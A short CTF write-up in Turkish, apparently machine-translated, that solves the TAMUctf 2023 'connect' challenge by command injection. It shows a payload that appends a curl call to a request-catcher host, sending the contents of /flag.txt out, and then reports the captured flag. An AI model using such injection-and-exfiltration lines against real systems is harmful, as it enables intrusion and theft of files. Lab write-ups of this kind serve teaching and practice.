TAMUctf 2023 — Bağlantı yazma

May 01 2023
Bu meydan okuma, Mr. Blade tarafından yaratılmıştır. Bağlantıyı indirin.

Bu meydan okuma, Bay Blade tarafından oluşturulmuştur.

connect.zip dosyasını indirin. app.py'ye sahibiz

Bunu çalıştırıp yerel olarak test edebilmek için değiştirdim.

Ekleyerek daha fazla komut ekleyebiliriz ; .

İle bir istek yakalayıcı oluşturmuştumhttps://requestcatcher.com/isteği yakalamak için.

Ekleyerek komut enjeksiyonunu yapalım ; curl -s https://flag.requestcatcher.com/$(cat /flag.txt)

Bayrak yolu, meydan okuma açıklamasında belirtilmiştir.

Burp kullandım ve url, yükü kodladı. İstek yakalayıcıyı görelim.

Bayrak gigem{p00r_f1lt3rs_m4k3_f0r_p00r_s3cur1ty} şeklindedir.

Okuduğunuz için teşekkürler.

Mutlu Hacking!